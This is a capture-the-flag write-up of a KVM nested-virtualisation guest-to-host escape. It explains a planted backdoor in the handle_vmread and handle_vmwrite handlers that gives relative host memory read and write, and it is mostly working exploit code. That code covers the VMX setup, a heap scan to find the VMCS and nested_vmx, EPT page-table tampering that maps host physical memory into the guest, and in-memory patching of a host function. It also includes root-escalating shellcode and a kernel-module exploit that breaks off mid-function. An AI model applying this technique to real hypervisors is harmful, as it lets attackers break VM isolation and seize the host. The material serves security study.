	u16 guest_es_selector;
	u16 guest_cs_selector;
	u16 guest_ss_selector;
	u16 guest_ds_selector;
	u16 guest_fs_selector;
	u16 guest_gs_selector;
	u16 guest_ldtr_selector;
	u16 guest_tr_selector;
	u16 guest_intr_status;
	u16 host_es_selector;
	u16 host_cs_selector;
	u16 host_ss_selector;
	u16 host_ds_selector;
	u16 host_fs_selector;
	u16 host_gs_selector;
	u16 host_tr_selector;
	u16 guest_pml_index;
};

static int handle_vmread(struct kvm_vcpu *vcpu)
{
	struct vmcs12 *vmcs12 = is_guest_mode(vcpu) ? get_shadow_vmcs12(vcpu)
						    : get_vmcs12(vcpu);
	unsigned long exit_qualification = vmx_get_exit_qual(vcpu);
	u32 instr_info = vmcs_read32(VMX_INSTRUCTION_INFO);
	struct vcpu_vmx *vmx = to_vmx(vcpu);
	struct x86_exception e;
	unsigned long field;
	u64 value;
	gva_t gva = 0;
	short offset;
	int len, r;

	if (!nested_vmx_check_permission(vcpu))
		return 1;

	/* Decode instruction info and find the field to read */
	field = kvm_register_read(vcpu, (((instr_info) >> 28) & 0xf));

	if (!nested_vmx_is_evmptr12_valid(vmx)) {
		/*
		 * In VMX non-root operation, when the VMCS-link pointer is INVALID_GPA,
		 * any VMREAD sets the ALU flags for VMfailInvalid.
		 */
		if (vmx->nested.current_vmptr == INVALID_GPA ||
		    (is_guest_mode(vcpu) &&
		     get_vmcs12(vcpu)->vmcs_link_pointer == INVALID_GPA))
			return nested_vmx_failInvalid(vcpu);

		offset = get_vmcs12_field_offset(field);
		if (offset < 0)
			return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

		if (!is_guest_mode(vcpu) && is_vmcs12_ext_field(field))
			copy_vmcs02_to_vmcs12_rare(vcpu, vmcs12);

		/* Read the field, zero-extended to a u64 value */
		value = vmcs12_read_any(vmcs12, field, offset);
	} else {
		/*
		 * Hyper-V TLFS (as of 6.0b) explicitly states, that while an
		 * enlightened VMCS is active VMREAD/VMWRITE instructions are
		 * unsupported. Unfortunately, certain versions of Windows 11
		 * don't comply with this requirement which is not enforced in
		 * genuine Hyper-V. Allow VMREAD from an enlightened VMCS as a
		 * workaround, as misbehaving guests will panic on VM-Fail.
		 * Note, enlightened VMCS is incompatible with shadow VMCS so
		 * all VMREADs from L2 should go to L1.
		 */
		if (WARN_ON_ONCE(is_guest_mode(vcpu)))
			return nested_vmx_failInvalid(vcpu);

		offset = evmcs_field_offset(field, NULL);
		if (offset < 0)
			return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

		/* Read the field, zero-extended to a u64 value */
		value = evmcs_read_any(nested_vmx_evmcs(vmx), field, offset);
	}

	/*
	 * Now copy part of this value to register or memory, as requested.
	 * Note that the number of bits actually copied is 32 or 64 depending
	 * on the guest's mode (32 or 64 bit), not on the given field's length.
	 */
	if (instr_info & BIT(10)) {
		kvm_register_write(vcpu, (((instr_info) >> 3) & 0xf), value);
	} else {
		len = is_64_bit_mode(vcpu) ? 8 : 4;
		if (get_vmx_mem_address(vcpu, exit_qualification,
					instr_info, true, len, &gva))
			return 1;
		/* _system ok, nested_vmx_check_permission has verified cpl=0 */
		r = kvm_write_guest_virt_system(vcpu, gva, &value, len, &e);
		if (r != X86EMUL_CONTINUE)
			return kvm_handle_memory_failure(vcpu, r, &e);
	}

	return nested_vmx_succeed(vcpu);
}

static int handle_vmwrite(struct kvm_vcpu *vcpu)
{
	struct vmcs12 *vmcs12 = is_guest_mode(vcpu) ? get_shadow_vmcs12(vcpu)
						    : get_vmcs12(vcpu);
	unsigned long exit_qualification = vmx_get_exit_qual(vcpu);
	u32 instr_info = vmcs_read32(VMX_INSTRUCTION_INFO);
	struct vcpu_vmx *vmx = to_vmx(vcpu);
	struct x86_exception e;
	unsigned long field;
	short offset;
	gva_t gva;
	int len, r;

	/*
	 * The value to write might be 32 or 64 bits, depending on L1's long
	 * mode, and eventually we need to write that into a field of several
	 * possible lengths. The code below first zero-extends the value to 64
	 * bit (value), and then copies only the appropriate number of
	 * bits into the vmcs12 field.
	 */
	u64 value = 0;

	if (!nested_vmx_check_permission(vcpu))
		return 1;

	/*
	 * In VMX non-root operation, when the VMCS-link pointer is INVALID_GPA,
	 * any VMWRITE sets the ALU flags for VMfailInvalid.
	 */
	if (vmx->nested.current_vmptr == INVALID_GPA ||
	    (is_guest_mode(vcpu) &&
	     get_vmcs12(vcpu)->vmcs_link_pointer == INVALID_GPA))
		return nested_vmx_failInvalid(vcpu);

	if (instr_info & BIT(10))
		value = kvm_register_read(vcpu, (((instr_info) >> 3) & 0xf));
	else {
		len = is_64_bit_mode(vcpu) ? 8 : 4;
		if (get_vmx_mem_address(vcpu, exit_qualification,
					instr_info, false, len, &gva))
			return 1;
		r = kvm_read_guest_virt(vcpu, gva, &value, len, &e);
		if (r != X86EMUL_CONTINUE)
			return kvm_handle_memory_failure(vcpu, r, &e);
	}

	field = kvm_register_read(vcpu, (((instr_info) >> 28) & 0xf));

	offset = get_vmcs12_field_offset(field);
	if (offset < 0)
		return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

	/*
	 * If the vCPU supports "VMWRITE to any supported field in the
	 * VMCS," then the "read-only" fields are actually read/write.
	 */
	if (vmcs_field_readonly(field) &&
	    !nested_cpu_has_vmwrite_any_field(vcpu))
		return nested_vmx_fail(vcpu, VMXERR_VMWRITE_READ_ONLY_VMCS_COMPONENT);

	/*
	 * Ensure vmcs12 is up-to-date before any VMWRITE that dirties
	 * vmcs12, else we may crush a field or consume a stale value.
	 */
	if (!is_guest_mode(vcpu) && !is_shadow_field_rw(field))
		copy_vmcs02_to_vmcs12_rare(vcpu, vmcs12);

	/*
	 * Some Intel CPUs intentionally drop the reserved bits of the AR byte
	 * fields on VMWRITE.  Emulate this behavior to ensure consistent KVM
	 * behavior regardless of the underlying hardware, e.g. if an AR_BYTE
	 * field is intercepted for VMWRITE but not VMREAD (in L1), then VMREAD
	 * from L1 will return a different value than VMREAD from L2 (L1 sees
	 * the stripped down value, L2 sees the full value as stored by KVM).
	 */
	if (field >= GUEST_ES_AR_BYTES && field <= GUEST_TR_AR_BYTES)
		value &= 0x1f0ff;

	vmcs12_write_any(vmcs12, field, offset, value);

	/*
	 * Do not track vmcs12 dirty-state if in guest-mode as we actually
	 * dirty shadow vmcs12 instead of vmcs12.  Fields that can be updated
	 * by L1 without a vmexit are always updated in the vmcs02, i.e. don't
	 * "dirty" vmcs12, all others go down the prepare_vmcs02() slow path.
	 */
	if (!is_guest_mode(vcpu) && !is_shadow_field_rw(field)) {
		/*
		 * L1 can read these fields without exiting, ensure the
		 * shadow VMCS is up-to-date.
		 */
		if (enable_shadow_vmcs && is_shadow_field_ro(field)) {
			preempt_disable();
			vmcs_load(vmx->vmcs01.shadow_vmcs);

			__vmcs_writel(field, value);

			vmcs_clear(vmx->vmcs01.shadow_vmcs);
			vmcs_load(vmx->loaded_vmcs->vmcs);
			preempt_enable();
		}
		vmx->nested.dirty_vmcs12 = true;
	}

	return nested_vmx_succeed(vcpu);
}

int kvm_set_dr(struct kvm_vcpu *vcpu, int dr, unsigned long val)
{
	size_t size = ARRAY_SIZE(vcpu->arch.db);

	switch (dr) {
	case 0 ... 3:
		vcpu->arch.db[array_index_nospec(dr, size)] = val;
		if (!(vcpu->guest_debug & KVM_GUESTDBG_USE_HW_BP))
			vcpu->arch.eff_db[dr] = val;
		break;
	case 4:
	case 6:
		if (!kvm_dr6_valid(val))
			return 1; /* #GP */
		vcpu->arch.dr6 = (val & DR6_VOLATILE) | kvm_dr6_fixed(vcpu);
		break;
	case 5:
	default: /* 7 */
		if (!kvm_dr7_valid(val))
			return 1; /* #GP */
		vcpu->arch.dr7 = (val & DR7_VOLATILE) | DR7_FIXED_1;
		kvm_update_dr7(vcpu);
		break;
	}

	return 0;
}
EXPORT_SYMBOL_GPL(kvm_set_dr);

unsigned long kvm_get_dr(struct kvm_vcpu *vcpu, int dr)
{
	size_t size = ARRAY_SIZE(vcpu->arch.db);

	switch (dr) {
	case 0 ... 3:
		return vcpu->arch.db[array_index_nospec(dr, size)];
	case 4:
	case 6:
		return vcpu->arch.dr6;
	case 5:
	default: /* 7 */
		return vcpu->arch.dr7;
	}
}

Where the bug is

  • handle_vmwrite reads the vCPU's arch.db[0]; if it equals 0x1337BABE, it takes arch.db[1] as an index dr and stores the value of arch.db[2] at the address vmcs12 + 8*dr:

    *(u64 *)((u8 *)vmcs12 + 8 * vcpu->arch.db[1]) = vcpu->arch.db[2]

  • handle_vmread reads the vCPU's arch.db[0]; if it equals 0x1337BABE, it takes arch.db[1] as an index dr and copies the value at vmcs12 + 8*dr into arch.db[2]:

    vcpu->arch.db[2] = *(u64 *)((u8 *)vmcs12 + 8 * vcpu->arch.db[1])

This gives us arbitrary read/write relative to the struct vmcs12 pointer, and that pointer is the host-side address of a VMCS we allocated inside the guest. Why? This code path handles VMX instructions executed by the guest: vmread reads fields from the VMCS of the guest's own nested guest, and when the guest executes vmread it traps into the host VMM, which emulates it there - so the vmcs12 used here is precisely the cached copy of the nested guest's VMCS that we control.

In effect this is arbitrary read/write in the host (note that the struct kvm_vcpu *vcpu here still belongs to the L1 guest, not to the guest inside the guest).

Exploitation plan

VMX initialization

Using the VMX instructions

Some setup is needed before we can execute vmread/vmwrite. These instructions interact with a Virtual Machine Control Structure (VMCS); executed inside the guest, they interact with the nested guest's VMCS. So the guest must first enter VMX operation (i.e. enable nested virtualization) - without a nested guest's VMCS, vmread and vmwrite have nothing to operate on.

First, allocate and initialize a VMXON region and a VMCS region for the nested guest instance:

	vmxon_page = kmalloc(4096, GFP_KERNEL);
    memset(vmxon_page, 0, 4096);
    vmcs_page = kmalloc(4096, GFP_KERNEL);   
    memset(vmcs_page, 0, 4096);
    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmcs_page_pa = virt_to_phys(vmcs_page);
    printk("vmxon_page %p --- vmxon_page_pa %p",vmxon_page,vmxon_page_pa);
    printk("vmcs_page %p --- vmcs_page_pa %p",vmcs_page,vmcs_page_pa);

Next, fill in the header of vmxon_page and vmcs_page. MSRs are read with the rdmsr instruction, which uses eax, edx, and ecx: ecx holds the MSR index, and edx:eax receive the high and low 32 bits of the result. The instruction must run at ring 0 (or in real-address mode), otherwise it raises #GP(0); specifying a reserved or unimplemented MSR index in ecx also faults. Here we read the VMCS revision identifier from MSR_IA32_VMX_BASIC and store it at the start of both vmxon_page and vmcs_page:

    uint32_t a, d;
    asm volatile ("rdmsr" : "=a"(a), "=d"(d) : "c"(MSR_IA32_VMX_BASIC) : "memory");
    uint64_t vmcs_revision=a | ((uint64_t) d << 32);
    printk("vmcs_revision %p",vmcs_revision);
    *(uint64_t *)(vmxon_page) = vmcs_revision;
    *(uint64_t *)(vmcs_page) = vmcs_revision;

Then enable VMX: copy the guest's CR4 into rax, set bit 13 (CR4.VMXE), and write it back. This flips the virtualization-enable switch in CR4:

    asm volatile (
    "movq %cr4, %rax\n\t"
    "bts $13, %rax\n\t"
    "movq %rax, %cr4"
);

Note: VMXON, VMCLEAR, and VMPTRLD must be given the physical address of their respective region.

The vmxon instruction takes the physical address of the allocated VMXON region as its operand and enters VMX operation; the setna instruction then uses EFLAGS.CF to tell whether it succeeded:

  • setna means "set if not above": it sets a byte according to the outcome of vmxon. On success, vmxonret will be 0.

  asm volatile (
    "vmxon %[pa]\n\t"
    "setna %[ret]"
    : [ret] "=rm" (vmxonret)
    : [pa] "m" (vmxon_page_pa)
    : "cc", "memory"
    );
    printk("vmxonret %p",vmxonret);


Note that enabling VMX requires flipping two "switches": bit 13 of CR4 and the vmxon instruction itself.

A side note on GCC inline assembly: listing cc and memory in the clobber list (after the third colon) tells the compiler that the asm statement may modify the flags register and memory, so it will not assume previously cached values are still valid afterwards.

vmptrld loads a VMCS pointer and makes that VMCS the current one:


   asm volatile (
    "vmptrld %[pa]\n\t"
    "setna %[ret]"
    : [ret] "=rm" (vmptrldret)
    : [pa] "m" (vmcs_page_pa)
    : "cc", "memory"
);

Once a VMCS has been loaded onto a logical CPU, the processor does not allow it to be accessed with ordinary memory instructions - doing so misbehaves; the only sanctioned way to access it is through vmread and vmwrite.

Relative arbitrary read/write

For the arbitrary read, set db0 and db1; the value that was read comes back in db2:

static size_t read_relative(size_t offset_to_nest_vmcs)
{
    size_t value;
    size_t vmcs_field_value=0;
    size_t vmcs_field=0;
    size_t magic=0x1337BABE;
    asm("movq %0, %%db0"    ::"r" (magic));
    asm("movq %0, %%db1"    ::"r" (offset_to_nest_vmcs));
    asm volatile (
    "vmread %1, %0\n\t"  
    : "=r" (vmcs_field_value)
    : "r" (vmcs_field)
);
    asm("movq %%db2, %0" :"=r" (value));
    return value;

}

For the arbitrary write, set db0, db1, and db2; the value in db2 is written to the target location:

static void write_relative(size_t offset_to_nest_vmcs,size_t value)
{
    size_t vmcs_field_value=0;
    size_t vmcs_field=0;
    size_t magic=0x1337BABE;
    asm("movq %0, %%db0"    ::"r" (magic));
    asm("movq %0, %%db1"    ::"r" (offset_to_nest_vmcs));
    asm("movq %0, %%db2"    ::"r" (value));
    asm volatile (
    "vmwrite %1, %0\n\t"  
    : "=r" (vmcs_field_value)
    : "r" (vmcs_field)
);
    asm("movq %%db2, %0" :"=r" (value));

}

Finding the offset of the guest's VMCS

Our primitive reads and writes relative to the host virtual address of the nested guest's VMCS. VMCSes are allocated with kmalloc, and the kernel heap lives in the direct-mapping region, so we can scan relative offsets in both directions and look for VMCS-specific signatures to locate the host virtual address of the (L1) guest's VMCS.

As the signature we use the guest_idtr_base field: its value never changes, and a VMCS is page-aligned, so we only need to look at offset 0x208 within each page for the IDT base address 0xfffffe0000000000 (guest_idtr_base) to find the guest's VMCS.

For reference, at offset 0 the VMCS holds the vmcs_revision field:

 for (i = 0; i < 0x4000; i++) {
        pos_offset = ((i * 0x1000) + 0x208) / 8;
        neg_offset = ((i * -1 * 0x1000) + 0x208) / 8;

        pos_val = read_relative(pos_offset);
        if (pos_val == 0xfffffe0000000000) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        neg_val = read_relative(neg_offset);
        if (neg_val == 0xfffffe0000000000) {
            found_val = neg_val;
            found_offset = neg_offset;
            break;
        }
    }
    pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
    pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);

Finding nested_vmx and leaking the nested guest VMCS's host virtual address

The nested_vmx structure contains a pointer to the nested guest's VMCS: cached_vmcs12. It also contains fields whose values we already know: vmxon_ptr and current_vmptr, the guest-physical addresses of the VMXON region and VMCS we created. So we scan memory for those known guest-physical addresses at the expected relative positions; that gives us the offset of nested_vmx, hence the offset of cached_vmcs12, from which we read the host virtual address of the nested guest's VMCS.

struct nested_vmx {
    /* Has the level1 guest done vmxon? */
    bool vmxon;
    gpa_t vmxon_ptr;
    bool pml_full;

    /* The guest-physical address of the current VMCS L1 keeps for L2 */
    gpa_t current_vmptr;
    /*
     * Cache of the guest's VMCS, existing outside of guest memory.
     * Loaded from guest memory during VMPTRLD. Flushed to guest
     * memory during VMCLEAR and VMPTRLD.
     */
    struct vmcs12 *cached_vmcs12;
    ...
}
 for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;

        if (read_relative(pos_offset) == vmcs_page_pa && read_relative(pos_offset - 2) == vmxon_page_pa) {
            found_offset = pos_offset;   /* offset of nested_vmx.current_vmptr */
            break;
        }
    }
    /* cached_vmcs12 sits right after current_vmptr in nested_vmx */
    l2_vmcs_addr = read_relative(found_offset + 1);

Getting the physmap base address

Many thanks to nightu, Eurus, flyyy, and tplus for their help.

 /**
     * KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
     * so we can simply get the vmemmap_base like this in a SMALL-MEM env.
     * For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
     * which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
     * If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
     */
    vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
    for (;;) {
        arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

        if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
            kernel_base = buf[0] -  0x070;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
                   "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n", 
                   kernel_base, kernel_offset);
            break;
        }

        vmemmap_base -= 0x10000000;
    }
    printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

From the nested guest VMCS's host virtual address we derive the host's physmap base. First try a simple mask (the base is randomized only in 256 MB steps); if the object happened to sit more than 0x10000000 above the base we would have to fall back to the scanning approach above, but here the mask alone is enough:

   physbase = l2_vmcs_addr & ~0xfffffffull;

Getting the EPT

Using the offset of the guest's VMCS found earlier, read its EPTP field (a host physical address):

 eptp_value = read_relative(l1_vmcs_offset-50);

EPTP is the host physical address of the fourth-level (top-level) EPT table. Add physbase to get its host virtual address, subtract the host virtual address of the nested guest's VMCS (the base of our relative read/write primitive, which we have now leaked) to get an offset, and use that offset to read the first entry of the EPT table.

eptp_value = read_relative(l1_vmcs_offset-50);
ept_addr = physbase + (eptp_value & ~0xfffull);
ept_offset = (ept_addr-l2_vmcs_addr) / 8;
third_value = read_relative(ept_offset);

Modifying the guest's EPT

https://www.owalle.com/2018/12/10/kvm-memory/


The EPT tables and their entries all contain host physical addresses.

After reading the first entry of the fourth-level table we have the host physical address of the third-level table; again convert it to a host virtual address, compute the offset, and write a new entry into the third-level table. At this level one entry can map a whole 1 GiB huge page: 2^9 * 2^9 * 2^12 bytes = 2^30 bytes = 1 GiB.

third_addr = physbase + (third_value & ~0xfffull);
    pr_info("[exp]: third_addr: %llx\n", third_addr);

    third_offset = (third_addr - l2_vmcs_addr) / 8;
    pr_info("[exp]: third_offset: %llx\n", third_offset);

    write_relative(third_offset + 6, 0x87);

The value 0x87 marks the entry as a huge page (bits 0-2 are the read/write/execute permissions, bit 7 is the page-size bit), and its address field is 0, so the 1 GiB page starts at host physical address 0.

To avoid disturbing the existing mappings we add a new entry rather than overwrite one. We use entry 6, which covers guest-physical 6 GiB-7 GiB, so guest-physical addresses 6 GiB-7 GiB in the guest now map to host-physical 0-1 GiB (see the sketch below for the index and flag arithmetic).
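
A small sketch of that arithmetic (illustration only, not part of the exploit module):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t entry = 0x87;            /* the value written into the EPT table slot     */
    uint64_t gpa   = 6ull << 30;      /* some guest-physical address in [6 GiB, 7 GiB) */

    /* bits 0-2: read/write/execute, bit 7: this entry maps a 1 GiB page */
    printf("R=%llu W=%llu X=%llu huge=%llu\n",
           (unsigned long long)(entry & 1),
           (unsigned long long)((entry >> 1) & 1),
           (unsigned long long)((entry >> 2) & 1),
           (unsigned long long)((entry >> 7) & 1));

    /* a guest-physical address selects the slot at this level with bits 30-38 */
    printf("slot index of gpa 0x%llx = %llu\n",
           (unsigned long long)gpa, (unsigned long long)((gpa >> 30) & 0x1ff));   /* 6 */

    /* the 1 GiB frame base is the 1 GiB-aligned address field (0 here),
       so guest-physical 6 GiB + off lands at host-physical 0 + off */
    uint64_t frame = entry & ~((1ull << 30) - 1);
    printf("maps to host-physical 0x%llx\n",
           (unsigned long long)(frame + (gpa & ((1ull << 30) - 1))));
    return 0;
}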

Modifying the guest's CR3 page tables

Before:


+-------------------+
|     CR3 Register  |
+-------------------+
         |
         v
+-------------------+
|   Physical Memory |
|                   |
| +---------------+ |
| |     PGD       | |
| | [0]           | |
| | ...           | |
| | [272]         | |
| | ...           | |
| +---------------+ |
|                   |
+-------------------+

After:
+-------------------+
|     CR3 Register  |
+-------------------+
         |
         v
+-------------------+
|   Physical Memory |
|                   |
| +---------------+ |
| |     PGD       | |
| | [0]           | |
| | ...           | |
| | [272] --------+---> +---------------+
| | ...           | |   | New PGDE Page |
| +---------------+ |   | [0] -------+  |
|                   |   | ...        |  |
|                   |   +------------+  |
|                   |                |  
|                   |                v  
|                   |        +----------------+
|                   |        | 1GB Huge Page  |
|                   |        | at 0x180000000 |
|                   |        | (6GB physical) |
|                   |        +----------------+
+-------------------+

The guest's CR3 holds the guest-physical address of the guest's page tables (which translate GVA to GPA). We obviously cannot edit those entries through a physical address directly; we go through the guest's direct mapping, whose start address is given by the variable page_offset_base. The entries we write must themselves be in guest-physical form.

Here we write an entry into slot 272 of the fourth-level table (the PML4), and set the first entry of the new third-level table to 0x180000000 | (1<<7) | 0x3, so that guest virtual addresses 0xffff880000000000 through 0xffff880000000000 + 1 GiB map to guest-physical 6 GiB-7 GiB.

PML4 index 272 selects virtual-address bits 39-47: 272 = 0b100010000, which puts 0x88 into the address, and the bits above bit 47 are then filled with copies of bit 47 (canonical sign extension), giving 0xffff880000000000, as the sketch below shows.
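
A quick sketch of that index arithmetic (illustration only):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    /* PML4 slot 272 covers virtual-address bits 39-47; bit 47 is then sign-extended */
    uint64_t va = (uint64_t)272 << 39;            /* 0x0000880000000000 */
    if (va & (1ull << 47))
        va |= 0xffff000000000000ull;              /* canonical (sign-extended) form */
    printf("PML4[272] -> 0x%016llx\n", (unsigned long long)va);   /* 0xffff880000000000 */

    /* and the reverse: which PML4 slot does this address use? */
    printf("index = %llu\n", (unsigned long long)((va >> 39) & 0x1ff));   /* 272 */
    return 0;
}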

  	cr3 = read_cr3();
    four = (uint64_t *)((cr3 & ~0xfffull) + page_offset_base);

    third_page = kzalloc(0x1000, GFP_KERNEL);
    third = virt_to_phys(third_page);

    four[272] = third | 0x7;

    third_page[0] = 0x180000000 | (1 << 7) | 0x3;   /* 1 GiB page at guest-physical 6 GiB */

Finding a function to overwrite

Guest virtual addresses 0xffff880000000000 through +1 GiB now map to host physical 0-1 GiB, which is far more than the host actually has (the QEMU host VM only has a few hundred MB of RAM). So by walking from 0xffff880000000000 inside the guest we are effectively walking host physical memory from address 0, and we can locate the function we want to overwrite and replace it with shellcode.

It is enough to pick a byte pattern that lives in the same page as the target function.

The original function:
Searching with a hex editor, I picked 0x00001C70BF440F4C: apart from the region starting at 0x60 it occurs only here, and the offset within the page that we check is 0x503.

 for (i = 0; i < (1024ull << 20); i += 0x1000) {
        unsigned long long val = *((unsigned long long *)(0xffff880000000503 + i));

        // check for the pattern at the expected offset within the page
        if (val == 0x1C70BF440F4C) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }
    handle_vmread = handle_vmread_page + 0x4d0;

shellcode

  • CPU entry area mapping:
    This is a special region of kernel memory that holds important per-CPU data structures and entry points. Its address is fixed and is not affected by KASLR (kernel address space layout randomization).
    A few values stored at the start of this region keep a fixed offset from the kernel text segment, so if you can read them you can compute where the kernel code was actually loaded.

  • Because the CPU entry area sits at a fixed address, the attacker can simply read the contents of 0xfffffe0000000004 and, after a fixed adjustment, obtain the kernel base (see the sketch below).
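
In C, the first few instructions of the shellcode shown below boil down to something like this sketch (the 0x1008e00 delta is the build-specific constant taken from that shellcode, not a universal value):

/* Runs in host kernel context once the shellcode executes: one read from the
 * fixed cpu_entry_area page leaks a pointer into kernel text, and subtracting
 * the build-specific delta yields the KASLR base. */
unsigned long leaked     = *(volatile unsigned long *)0xfffffe0000000004ul;
unsigned long kaslr_base = leaked - 0x1008e00;   /* delta observed for this kernel build */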



/*
    push rax
    push rbx
    push rcx
    push rdx
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push rdi
    push rsi

    // get kaslr base
    mov rax, 0xfffffe0000000004
    mov rax, [rax]
    sub rax, 0x1008e00

    // r12 is kaslr_base
    mov r12, rax

    // commit_creds
    mov r13, r12
    add r13, 0xbdad0

    // init_cred
    mov r14, r12
    add r14, 0x1a52ca0

    mov rdi, r14
    call r13

    // filp_open
    mov r11, r12
    add r11, 0x292420

    // push /root/flag.txt
    mov rax, 0x7478742e6761
    push rax
    mov rax, 0x6c662f746f6f722f
    push rax
    mov rdi, rsp

    // O_RDONLY
    mov rsi, 0

    call r11

    // r10 is filp_ptr
    mov r10, rax

    // kernel_read
    mov r11, r12
    add r11, 0x294c70

    // writeable kernel address
    mov r9, r12
    add r9, 0x18ab000

    mov rdi, r10
    mov rsi, r9
    mov rdx, 0x100
    mov rcx, 0

    call r11

    pop rax
    pop rax

    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r12
    pop r11
    pop r10
    pop r9
    pop rdx
    pop rcx
    pop rbx
    pop rax
*/

Of course we cannot overwrite the function carelessly, or the handler may never make it back to the guest. So we first pad the path that must still execute up to the successful return with NOPs, have the shellcode save and restore the registers, and place a ret right after the point where the call to nested_vmx_succeed would have returned. (Debugging helps to find which instructions can be overwritten while still returning to the guest cleanly.)

memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    read_relative(0);   // trigger handle_vmread, which now runs the shellcode

    // scan for flag in memory
    for (i = 0; i < (1024ull << 20); i += 0x1000) {
        if (!memcmp((void *)(0xffff880000000000 + i), "corctf{", 7)) {
            pr_info("flag: %s\n", (char *)(0xffff880000000000 + i));
            break;
        }
    }


exp

My own reproduction exploit is rather ugly, so for the reader's benefit here is the Shellphish writeup exploit that I followed:

#include <linux/init.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/kprobes.h>
#include <linux/version.h>
#include <linux/efi.h>

#include <asm/uaccess.h>
#include <asm/fsgsbase.h>
#include <asm/io.h>
#include <linux/uaccess.h>

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset);
static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset);
static int proc_open(struct inode *inode, struct file *filep);


#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0)

static struct proc_ops fops = {
    .proc_open = proc_open,
    .proc_read = proc_read,
    .proc_write = proc_write,
};

#else

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .open = proc_open,
    .read = proc_read,
    .write = proc_write,
};

#endif

const char kvm_dat[] = "\x0f\x78\xc6\x3e";

/*
    push rax
    push rbx
    push rcx
    push rdx
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push rdi
    push rsi

    // get kaslr base
    mov rax, 0xfffffe0000000004
    mov rax, [rax]
    sub rax, 0x1008e00

    // r12 is kaslr_base
    mov r12, rax

    // commit_creds
    mov r13, r12
    add r13, 0xbdad0

    // init_cred
    mov r14, r12
    add r14, 0x1a52ca0

    mov rdi, r14
    call r13

    // filp_open
    mov r11, r12
    add r11, 0x292420

    // push /root/flag.txt
    mov rax, 0x7478742e6761
    push rax
    mov rax, 0x6c662f746f6f722f
    push rax
    mov rdi, rsp

    // O_RDONLY
    mov rsi, 0

    call r11

    // r10 is filp_ptr
    mov r10, rax

    // kernel_read
    mov r11, r12
    add r11, 0x294c70

    // writeable kernel address
    mov r9, r12
    add r9, 0x18ab000

    mov rdi, r10
    mov rsi, r9
    mov rdx, 0x100
    mov rcx, 0

    call r11

    pop rax
    pop rax

    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r12
    pop r11
    pop r10
    pop r9
    pop rdx
    pop rcx
    pop rbx
    pop rax
*/

const uint8_t shellcode[] = "\x50\x53\x51\x52\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x57\x56\x48\xb8\x04\x00\x00\x00\x00\xfe\xff\xff\x48\x8b\x00\x48\x2d\x00\x8e\x00\x01\x49\x89\xc4\x4d\x89\xe5\x49\x81\xc5\xd0\xda\x0b\x00\x4d\x89\xe6\x49\x81\xc6\xa0\x2c\xa5\x01\x4c\x89\xf7\x41\xff\xd5\x4d\x89\xe3\x49\x81\xc3\x20\x24\x29\x00\x48\xb8\x61\x67\x2e\x74\x78\x74\x00\x00\x50\x48\xb8\x2f\x72\x6f\x6f\x74\x2f\x66\x6c\x50\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x41\xff\xd3\x49\x89\xc2\x4d\x89\xe3\x49\x81\xc3\x70\x4c\x29\x00\x4d\x89\xe1\x49\x81\xc1\x00\xb0\x8a\x01\x4c\x89\xd7\x4c\x89\xce\x48\xc7\xc2\x00\x01\x00\x00\x48\xc7\xc1\x00\x00\x00\x00\x41\xff\xd3\x58\x58\x5e\x5f\x41\x5d\x41\x5e\x41\x5c\x41\x5b\x41\x5a\x41\x59\x5a\x59\x5b\x58";

uint64_t vmxon_page_pa, vmptrld_page_pa;

static __always_inline unsigned long long native_get_debugreg(int regno)
{
    unsigned long val = 0;    /* Damn you, gcc! */

    switch (regno) {
    case 0:
        asm("mov %%db0, %0" :"=r" (val));
        break;
    case 1:
        asm("mov %%db1, %0" :"=r" (val));
        break;
    case 2:
        asm("mov %%db2, %0" :"=r" (val));
        break;
    case 3:
        asm("mov %%db3, %0" :"=r" (val));
        break;
    case 6:
        asm("mov %%db6, %0" :"=r" (val));
        break;
    case 7:
        asm("mov %%db7, %0" :"=r" (val));
        break;
    default:
        BUG();
    }
    return val;
}

static __always_inline void native_set_debugreg(int regno, unsigned long value)
{
    switch (regno) {
    case 0:
        asm("mov %0, %%db0"    ::"r" (value));
        break;
    case 1:
        asm("mov %0, %%db1"    ::"r" (value));
        break;
    case 2:
        asm("mov %0, %%db2"    ::"r" (value));
        break;
    case 3:
        asm("mov %0, %%db3"    ::"r" (value));
        break;
    case 6:
        asm("mov %0, %%db6"    ::"r" (value));
        break;
    case 7:
